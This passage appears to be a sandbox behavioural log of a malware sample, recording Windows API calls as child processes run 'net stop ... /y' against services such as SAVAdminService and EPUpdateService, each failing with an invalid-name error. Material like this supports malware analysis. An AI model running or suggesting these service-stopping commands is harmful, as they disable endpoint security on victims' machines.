(_String1="continue", _String2="FA_Scheduler") returned -3 [0041.999] _wcsicmp (_String1="cont", _String2="FA_Scheduler") returned -3 [0041.999] _wcsicmp (_String1="file", _String2="FA_Scheduler") returned 8 [0041.999] _wcsicmp (_String1="files", _String2="FA_Scheduler") returned 8 [0041.999] _wcsicmp (_String1="group", _String2="FA_Scheduler") returned 1 [0041.999] _wcsicmp (_String1="groups", _String2="FA_Scheduler") returned 1 [0041.999] _wcsicmp (_String1="help", _String2="FA_Scheduler") returned 2 [0041.999] _wcsicmp (_String1="helpmsg", _String2="FA_Scheduler") returned 2 [0041.999] _wcsicmp (_String1="localgroup", _String2="FA_Scheduler") returned 6 [0041.999] _wcsicmp (_String1="pause", _String2="FA_Scheduler") returned 10 [0041.999] _wcsicmp (_String1="session", _String2="FA_Scheduler") returned 13 [0041.999] _wcsicmp (_String1="sessions", _String2="FA_Scheduler") returned 13 [0041.999] _wcsicmp (_String1="sess", _String2="FA_Scheduler") returned 13 [0041.999] _wcsicmp (_String1="share", _String2="FA_Scheduler") returned 13 [0041.999] _wcsicmp (_String1="start", _String2="FA_Scheduler") returned 13 [0041.999] _wcsicmp (_String1="stats", _String2="FA_Scheduler") returned 13 [0042.000] _wcsicmp (_String1="statistics", _String2="FA_Scheduler") returned 13 [0042.000] _wcsicmp (_String1="stop", _String2="FA_Scheduler") returned 13 [0042.000] _wcsicmp (_String1="time", _String2="FA_Scheduler") returned 14 [0042.000] _wcsicmp (_String1="user", _String2="FA_Scheduler") returned 15 [0042.000] _wcsicmp (_String1="users", _String2="FA_Scheduler") returned 15 [0042.000] _wcsicmp (_String1="msg", _String2="FA_Scheduler") returned 7 [0042.000] _wcsicmp (_String1="messenger", _String2="FA_Scheduler") returned 7 [0042.000] _wcsicmp (_String1="receiver", _String2="FA_Scheduler") returned 12 [0042.000] _wcsicmp (_String1="rcv", _String2="FA_Scheduler") returned 12 [0042.000] _wcsicmp (_String1="netpopup", _String2="FA_Scheduler") returned 8 [0042.000] _wcsicmp (_String1="redirector", _String2="FA_Scheduler") returned 12 [0042.000] _wcsicmp (_String1="redir", _String2="FA_Scheduler") returned 12 [0042.000] _wcsicmp (_String1="rdr", _String2="FA_Scheduler") returned 12 [0042.000] _wcsicmp (_String1="workstation", _String2="FA_Scheduler") returned 17 [0042.000] _wcsicmp (_String1="work", _String2="FA_Scheduler") returned 17 [0042.000] _wcsicmp (_String1="wksta", _String2="FA_Scheduler") returned 17 [0042.000] _wcsicmp (_String1="prdr", _String2="FA_Scheduler") returned 10 [0042.000] _wcsicmp (_String1="devrdr", _String2="FA_Scheduler") returned -2 [0042.000] _wcsicmp (_String1="lanmanworkstation", _String2="FA_Scheduler") returned 6 [0042.000] _wcsicmp (_String1="server", _String2="FA_Scheduler") returned 13 [0042.000] _wcsicmp (_String1="svr", _String2="FA_Scheduler") returned 13 [0042.000] _wcsicmp (_String1="srv", _String2="FA_Scheduler") returned 13 [0042.000] _wcsicmp (_String1="lanmanserver", _String2="FA_Scheduler") returned 6 [0042.000] _wcsicmp (_String1="alerter", _String2="FA_Scheduler") returned -5 [0042.000] _wcsicmp (_String1="netlogon", _String2="FA_Scheduler") returned 8 [0042.000] _wcsupr (in: _String="FA_Scheduler" | out: _String="FA_SCHEDULER") returned="FA_SCHEDULER" [0042.000] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x2254d0 [0042.003] GetServiceKeyNameW (in: hSCManager=0x2254d0, lpDisplayName="FA_SCHEDULER", lpServiceName=0x3baaf0, lpcchBuffer=0xdf784 | out: lpServiceName="", lpcchBuffer=0xdf784) returned 0 [0042.004] _wcsicmp (_String1="msg", _String2="FA_SCHEDULER") returned 7 [0042.004] _wcsicmp (_String1="messenger", _String2="FA_SCHEDULER") returned 7 [0042.004] _wcsicmp (_String1="receiver", _String2="FA_SCHEDULER") returned 12 [0042.004] _wcsicmp (_String1="rcv", _String2="FA_SCHEDULER") returned 12 [0042.004] _wcsicmp (_String1="redirector", _String2="FA_SCHEDULER") returned 12 [0042.004] _wcsicmp (_String1="redir", _String2="FA_SCHEDULER") returned 12 [0042.004] _wcsicmp (_String1="rdr", _String2="FA_SCHEDULER") returned 12 [0042.004] _wcsicmp (_String1="workstation", _String2="FA_SCHEDULER") returned 17 [0042.004] _wcsicmp (_String1="work", _String2="FA_SCHEDULER") returned 17 [0042.004] _wcsicmp (_String1="wksta", _String2="FA_SCHEDULER") returned 17 [0042.004] _wcsicmp (_String1="prdr", _String2="FA_SCHEDULER") returned 10 [0042.004] _wcsicmp (_String1="devrdr", _String2="FA_SCHEDULER") returned -2 [0042.004] _wcsicmp (_String1="lanmanworkstation", _String2="FA_SCHEDULER") returned 6 [0042.004] _wcsicmp (_String1="server", _String2="FA_SCHEDULER") returned 13 [0042.004] _wcsicmp (_String1="svr", _String2="FA_SCHEDULER") returned 13 [0042.004] _wcsicmp (_String1="srv", _String2="FA_SCHEDULER") returned 13 [0042.004] _wcsicmp (_String1="lanmanserver", _String2="FA_SCHEDULER") returned 6 [0042.004] _wcsicmp (_String1="alerter", _String2="FA_SCHEDULER") returned -5 [0042.004] _wcsicmp (_String1="netlogon", _String2="FA_SCHEDULER") returned 8 [0042.004] NetServiceControl (in: servername=0x0, service="FA_SCHEDULER", opcode=0x0, arg=0x0, bufptr=0xdf780 | out: bufptr=0xdf780) returned 0x889 [0042.005] wcscpy_s (in: _Destination=0x3ba4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0042.005] LoadLibraryW (lpLibFileName="NETMSG") returned 0x73ef0000 [0042.006] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x73ef0000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0x3bb338, nSize=0x800, Arguments=0x3b9dd8 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0042.007] GetFileType (hFile=0x26c) returned 0x3 [0042.007] LocalAlloc (uFlags=0x0, uBytes=0x3c) returned 0x224000 [0042.007] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The service name is invalid.\r\n", cchWideChar=30, lpMultiByteStr=0x224000, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The service name is invalid.\r\n", lpUsedDefaultChar=0x0) returned 30 [0042.007] WriteFile (in: hFile=0x26c, lpBuffer=0x224000*, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0xdf6c0, lpOverlapped=0x0 | out: lpBuffer=0x224000*, lpNumberOfBytesWritten=0xdf6c0*=0x1e, lpOverlapped=0x0) returned 1 [0042.007] LocalFree (hMem=0x224000) returned 0x0 [0042.007] GetFileType (hFile=0x26c) returned 0x3 [0042.007] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x2262a8 [0042.007] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x2262a8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n\"", lpUsedDefaultChar=0x0) returned 2 [0042.007] WriteFile (in: hFile=0x26c, lpBuffer=0x2262a8*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0xdf6c0, lpOverlapped=0x0 | out: lpBuffer=0x2262a8*, lpNumberOfBytesWritten=0xdf6c0*=0x2, lpOverlapped=0x0) returned 1 [0042.007] LocalFree (hMem=0x2262a8) returned 0x0 [0042.007] _ultow (in: _Dest=0x889, _Radix=915184 | out: _Dest=0x889) returned="2185" [0042.007] FormatMessageW (in: dwFlags=0x2800, lpSource=0x73ef0000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0x3bb338, nSize=0x800, Arguments=0x3b9dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0042.007] GetFileType (hFile=0x26c) returned 0x3 [0042.007] LocalAlloc (uFlags=0x0, uBytes=0x68) returned 0x2262a8 [0042.008] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="More help is available by typing NET HELPMSG 2185.\r\n", cchWideChar=52, lpMultiByteStr=0x2262a8, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="More help is available by typing NET HELPMSG 2185.\r\n\x04", lpUsedDefaultChar=0x0) returned 52 [0042.008] WriteFile (in: hFile=0x26c, lpBuffer=0x2262a8*, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0xdf6cc, lpOverlapped=0x0 | out: lpBuffer=0x2262a8*, lpNumberOfBytesWritten=0xdf6cc*=0x34, lpOverlapped=0x0) returned 1 [0042.008] LocalFree (hMem=0x2262a8) returned 0x0 [0042.008] GetFileType (hFile=0x26c) returned 0x3 [0042.008] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x2262a8 [0042.008] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x2262a8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n\"", lpUsedDefaultChar=0x0) returned 2 [0042.008] WriteFile (in: hFile=0x26c, lpBuffer=0x2262a8*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0xdf6cc, lpOverlapped=0x0 | out: lpBuffer=0x2262a8*, lpNumberOfBytesWritten=0xdf6cc*=0x2, lpOverlapped=0x0) returned 1 [0042.008] LocalFree (hMem=0x2262a8) returned 0x0 [0042.008] NetApiBufferFree (Buffer=0x221c70) returned 0x0 [0042.008] NetApiBufferFree (Buffer=0x221c88) returned 0x0 [0042.008] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop FA_Scheduler /y" [0042.008] exit (_Code=2) Process: id = "63" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x48273000" os_pid = "0x178" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x908" cmd_line = "net stop SAVAdminService /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 131 os_tid = 0x688 Process: id = "64" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x4880a000" os_pid = "0x7f0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "63" os_parent_pid = "0x178" cmd_line = "C:\\Windows\\system32\\net1 stop SAVAdminService /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 132 os_tid = 0x7a8 [0042.335] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x28fa80 | out: lpSystemTimeAsFileTime=0x28fa80*(dwLowDateTime=0xe36f9260, dwHighDateTime=0x1d57a86)) [0042.335] GetCurrentProcessId () returned 0x7f0 [0042.335] GetCurrentThreadId () returned 0x7a8 [0042.335] GetTickCount () returned 0x1145919 [0042.335] QueryPerformanceCounter (in: lpPerformanceCount=0x28fa78 | out: lpPerformanceCount=0x28fa78*=16261947819) returned 1 [0042.335] GetModuleHandleA (lpModuleName=0x0) returned 0x100000 [0042.335] __set_app_type (_Type=0x1) [0042.335] __p__fmode () returned 0x74eb31f4 [0042.335] __p__commode () returned 0x74eb31fc [0042.335] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x10ffe6) returned 0x0 [0042.336] __getmainargs (in: _Argc=0x119064, _Argv=0x11906c, _Env=0x119068, _DoWildCard=0, _StartInfo=0x119024 | out: _Argc=0x119064, _Argv=0x11906c, _Env=0x119068) returned 0 [0042.336] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0042.336] GetConsoleOutputCP () returned 0x1b5 [0042.336] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x119080 | out: lpCPInfo=0x119080) returned 1 [0042.336] SetThreadUILanguage (LangId=0x0) returned 0x409 [0042.339] sprintf_s (in: _DstBuf=0x28fa38, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0042.340] setlocale (category=0, locale=".437") returned="English_United States.437" [0042.344] GetStdHandle (nStdHandle=0xfffffff5) returned 0x264 [0042.344] GetStdHandle (nStdHandle=0xfffffff4) returned 0x26c [0042.344] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop SAVAdminService /y" [0042.344] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x28f804, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0042.344] RtlAllocateHeap (HeapHandle=0x2d0000, Flags=0x0, Size=0x72) returned 0x2df788 [0042.344] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0042.344] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x28fa08 | out: Buffer=0x28fa08*=0x2e1c78) returned 0x0 [0042.344] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x28fa08 | out: Buffer=0x28fa08*=0x2e1c90) returned 0x0 [0042.344] _fileno (_File=0x74eb2900) returned -2 [0042.344] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0042.344] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0042.344] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0042.344] _wcsicmp (_String1="config", _String2="stop") returned -16 [0042.344] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0042.344] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0042.344] _wcsicmp (_String1="file", _String2="stop") returned -13 [0042.344] _wcsicmp (_String1="files", _String2="stop") returned -13 [0042.344] _wcsicmp (_String1="group", _String2="stop") returned -12 [0042.344] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0042.344] _wcsicmp (_String1="help", _String2="stop") returned -11 [0042.344] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0042.344] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0042.345] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0042.345] _wcsicmp (_String1="session", _String2="stop") returned -15 [0042.345] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0042.345] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0042.345] _wcsicmp (_String1="share", _String2="stop") returned -12 [0042.345] _wcsicmp (_String1="start", _String2="stop") returned -14 [0042.345] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0042.345] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0042.345] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0042.345] _wcsicmp (_String1="accounts", _String2="SAVAdminService") returned -18 [0042.345] _wcsicmp (_String1="computer", _String2="SAVAdminService") returned -16 [0042.345] _wcsicmp (_String1="config", _String2="SAVAdminService") returned -16 [0042.345] _wcsicmp (_String1="continue", _String2="SAVAdminService") returned -16 [0042.345] _wcsicmp (_String1="cont", _String2="SAVAdminService") returned -16 [0042.345] _wcsicmp (_String1="file", _String2="SAVAdminService") returned -13 [0042.345] _wcsicmp (_String1="files", _String2="SAVAdminService") returned -13 [0042.345] _wcsicmp (_String1="group", _String2="SAVAdminService") returned -12 [0042.345] _wcsicmp (_String1="groups", _String2="SAVAdminService") returned -12 [0042.345] _wcsicmp (_String1="help", _String2="SAVAdminService") returned -11 [0042.345] _wcsicmp (_String1="helpmsg", _String2="SAVAdminService") returned -11 [0042.345] _wcsicmp (_String1="localgroup", _String2="SAVAdminService") returned -7 [0042.345] _wcsicmp (_String1="pause", _String2="SAVAdminService") returned -3 [0042.345] _wcsicmp (_String1="session", _String2="SAVAdminService") returned 4 [0042.345] _wcsicmp (_String1="sessions", _String2="SAVAdminService") returned 4 [0042.345] _wcsicmp (_String1="sess", _String2="SAVAdminService") returned 4 [0042.345] _wcsicmp (_String1="share", _String2="SAVAdminService") returned 7 [0042.345] _wcsicmp (_String1="start", _String2="SAVAdminService") returned 19 [0042.345] _wcsicmp (_String1="stats", _String2="SAVAdminService") returned 19 [0042.345] _wcsicmp (_String1="statistics", _String2="SAVAdminService") returned 19 [0042.345] _wcsicmp (_String1="stop", _String2="SAVAdminService") returned 19 [0042.345] _wcsicmp (_String1="time", _String2="SAVAdminService") returned 1 [0042.345] _wcsicmp (_String1="user", _String2="SAVAdminService") returned 2 [0042.345] _wcsicmp (_String1="users", _String2="SAVAdminService") returned 2 [0042.345] _wcsicmp (_String1="msg", _String2="SAVAdminService") returned -6 [0042.346] _wcsicmp (_String1="messenger", _String2="SAVAdminService") returned -6 [0042.346] _wcsicmp (_String1="receiver", _String2="SAVAdminService") returned -1 [0042.346] _wcsicmp (_String1="rcv", _String2="SAVAdminService") returned -1 [0042.346] _wcsicmp (_String1="netpopup", _String2="SAVAdminService") returned -5 [0042.346] _wcsicmp (_String1="redirector", _String2="SAVAdminService") returned -1 [0042.346] _wcsicmp (_String1="redir", _String2="SAVAdminService") returned -1 [0042.346] _wcsicmp (_String1="rdr", _String2="SAVAdminService") returned -1 [0042.346] _wcsicmp (_String1="workstation", _String2="SAVAdminService") returned 4 [0042.346] _wcsicmp (_String1="work", _String2="SAVAdminService") returned 4 [0042.346] _wcsicmp (_String1="wksta", _String2="SAVAdminService") returned 4 [0042.346] _wcsicmp (_String1="prdr", _String2="SAVAdminService") returned -3 [0042.346] _wcsicmp (_String1="devrdr", _String2="SAVAdminService") returned -15 [0042.346] _wcsicmp (_String1="lanmanworkstation", _String2="SAVAdminService") returned -7 [0042.346] _wcsicmp (_String1="server", _String2="SAVAdminService") returned 4 [0042.346] _wcsicmp (_String1="svr", _String2="SAVAdminService") returned 21 [0042.346] _wcsicmp (_String1="srv", _String2="SAVAdminService") returned 17 [0042.346] _wcsicmp (_String1="lanmanserver", _String2="SAVAdminService") returned -7 [0042.346] _wcsicmp (_String1="alerter", _String2="SAVAdminService") returned -18 [0042.346] _wcsicmp (_String1="netlogon", _String2="SAVAdminService") returned -5 [0042.346] _wcsupr (in: _String="SAVAdminService" | out: _String="SAVADMINSERVICE") returned="SAVADMINSERVICE" [0042.346] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x2e5460 [0042.350] GetServiceKeyNameW (in: hSCManager=0x2e5460, lpDisplayName="SAVADMINSERVICE", lpServiceName=0x11aaf0, lpcchBuffer=0x28f9a4 | out: lpServiceName="", lpcchBuffer=0x28f9a4) returned 0 [0042.351] _wcsicmp (_String1="msg", _String2="SAVADMINSERVICE") returned -6 [0042.351] _wcsicmp (_String1="messenger", _String2="SAVADMINSERVICE") returned -6 [0042.351] _wcsicmp (_String1="receiver", _String2="SAVADMINSERVICE") returned -1 [0042.351] _wcsicmp (_String1="rcv", _String2="SAVADMINSERVICE") returned -1 [0042.351] _wcsicmp (_String1="redirector", _String2="SAVADMINSERVICE") returned -1 [0042.351] _wcsicmp (_String1="redir", _String2="SAVADMINSERVICE") returned -1 [0042.351] _wcsicmp (_String1="rdr", _String2="SAVADMINSERVICE") returned -1 [0042.351] _wcsicmp (_String1="workstation", _String2="SAVADMINSERVICE") returned 4 [0042.351] _wcsicmp (_String1="work", _String2="SAVADMINSERVICE") returned 4 [0042.351] _wcsicmp (_String1="wksta", _String2="SAVADMINSERVICE") returned 4 [0042.351] _wcsicmp (_String1="prdr", _String2="SAVADMINSERVICE") returned -3 [0042.351] _wcsicmp (_String1="devrdr", _String2="SAVADMINSERVICE") returned -15 [0042.351] _wcsicmp (_String1="lanmanworkstation", _String2="SAVADMINSERVICE") returned -7 [0042.351] _wcsicmp (_String1="server", _String2="SAVADMINSERVICE") returned 4 [0042.351] _wcsicmp (_String1="svr", _String2="SAVADMINSERVICE") returned 21 [0042.351] _wcsicmp (_String1="srv", _String2="SAVADMINSERVICE") returned 17 [0042.351] _wcsicmp (_String1="lanmanserver", _String2="SAVADMINSERVICE") returned -7 [0042.351] _wcsicmp (_String1="alerter", _String2="SAVADMINSERVICE") returned -18 [0042.351] _wcsicmp (_String1="netlogon", _String2="SAVADMINSERVICE") returned -5 [0042.351] NetServiceControl (in: servername=0x0, service="SAVADMINSERVICE", opcode=0x0, arg=0x0, bufptr=0x28f9a0 | out: bufptr=0x28f9a0) returned 0x889 [0042.352] wcscpy_s (in: _Destination=0x11a4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0042.352] LoadLibraryW (lpLibFileName="NETMSG") returned 0x74770000 [0042.353] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x74770000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0x11b338, nSize=0x800, Arguments=0x119dd8 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0042.354] GetFileType (hFile=0x26c) returned 0x3 [0042.354] LocalAlloc (uFlags=0x0, uBytes=0x3c) returned 0x2e3f90 [0042.354] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The service name is invalid.\r\n", cchWideChar=30, lpMultiByteStr=0x2e3f90, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The service name is invalid.\r\n", lpUsedDefaultChar=0x0) returned 30 [0042.354] WriteFile (in: hFile=0x26c, lpBuffer=0x2e3f90*, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0x28f8e0, lpOverlapped=0x0 | out: lpBuffer=0x2e3f90*, lpNumberOfBytesWritten=0x28f8e0*=0x1e, lpOverlapped=0x0) returned 1 [0042.354] LocalFree (hMem=0x2e3f90) returned 0x0 [0042.354] GetFileType (hFile=0x26c) returned 0x3 [0042.354] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x2e6238 [0042.354] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x2e6238, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n.", lpUsedDefaultChar=0x0) returned 2 [0042.355] WriteFile (in: hFile=0x26c, lpBuffer=0x2e6238*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x28f8e0, lpOverlapped=0x0 | out: lpBuffer=0x2e6238*, lpNumberOfBytesWritten=0x28f8e0*=0x2, lpOverlapped=0x0) returned 1 [0042.355] LocalFree (hMem=0x2e6238) returned 0x0 [0042.355] _ultow (in: _Dest=0x889, _Radix=2685200 | out: _Dest=0x889) returned="2185" [0042.355] FormatMessageW (in: dwFlags=0x2800, lpSource=0x74770000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0x11b338, nSize=0x800, Arguments=0x119dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0042.355] GetFileType (hFile=0x26c) returned 0x3 [0042.355] LocalAlloc (uFlags=0x0, uBytes=0x68) returned 0x2e6238 [0042.355] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="More help is available by typing NET HELPMSG 2185.\r\n", cchWideChar=52, lpMultiByteStr=0x2e6238, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="More help is available by typing NET HELPMSG 2185.\r\n\x04", lpUsedDefaultChar=0x0) returned 52 [0042.355] WriteFile (in: hFile=0x26c, lpBuffer=0x2e6238*, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0x28f8ec, lpOverlapped=0x0 | out: lpBuffer=0x2e6238*, lpNumberOfBytesWritten=0x28f8ec*=0x34, lpOverlapped=0x0) returned 1 [0042.355] LocalFree (hMem=0x2e6238) returned 0x0 [0042.355] GetFileType (hFile=0x26c) returned 0x3 [0042.355] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x2e6238 [0042.355] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x2e6238, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n.", lpUsedDefaultChar=0x0) returned 2 [0042.355] WriteFile (in: hFile=0x26c, lpBuffer=0x2e6238*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x28f8ec, lpOverlapped=0x0 | out: lpBuffer=0x2e6238*, lpNumberOfBytesWritten=0x28f8ec*=0x2, lpOverlapped=0x0) returned 1 [0042.355] LocalFree (hMem=0x2e6238) returned 0x0 [0042.355] NetApiBufferFree (Buffer=0x2e1c78) returned 0x0 [0042.356] NetApiBufferFree (Buffer=0x2e1c90) returned 0x0 [0042.356] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop SAVAdminService /y" [0042.356] exit (_Code=2) Process: id = "65" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x47378000" os_pid = "0x5b8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x908" cmd_line = "net stop EPUpdateService /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 133 os_tid = 0x6ac Process: id = "66" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x466e9000" os_pid = "0x734" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "65" os_parent_pid = "0x5b8" cmd_line = "C:\\Windows\\system32\\net1 stop EPUpdateService /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 134 os_tid = 0x640 [0042.576] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x36f970 | out: lpSystemTimeAsFileTime=0x36f970*(dwLowDateTime=0xe395a860, dwHighDateTime=0x1d57a86)) [0042.576] GetCurrentProcessId () returned 0x734 [0042.576] GetCurrentThreadId () returned 0x640 [0042.576] GetTickCount () returned 0x1145a12 [0042.576] QueryPerformanceCounter (in: lpPerformanceCount=0x36f968 | out: lpPerformanceCount=0x36f968*=16286112241) returned 1 [0042.577] GetModuleHandleA (lpModuleName=0x0) returned 0xe60000 [0042.577] __set_app_type (_Type=0x1) [0042.577] __p__fmode () returned 0x74eb31f4 [0042.577] __p__commode () returned 0x74eb31fc [0042.577] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xe6ffe6) returned 0x0 [0042.577] __getmainargs (in: _Argc=0xe79064, _Argv=0xe7906c, _Env=0xe79068, _DoWildCard=0, _StartInfo=0xe79024 | out: _Argc=0xe79064, _Argv=0xe7906c, _Env=0xe79068) returned 0 [0042.577] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0042.577] GetConsoleOutputCP () returned 0x1b5 [0042.577] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xe79080 | out: lpCPInfo=0xe79080) returned 1 [0042.577] SetThreadUILanguage (LangId=0x0) returned 0x409 [0042.580] sprintf_s (in: _DstBuf=0x36f928, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0042.580] setlocale (category=0, locale=".437") returned="English_United States.437" [0042.582] GetStdHandle (nStdHandle=0xfffffff5) returned 0x264 [0042.582] GetStdHandle (nStdHandle=0xfffffff4) returned 0x26c [0042.582] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop EPUpdateService /y" [0042.582] GetModuleFileNameW 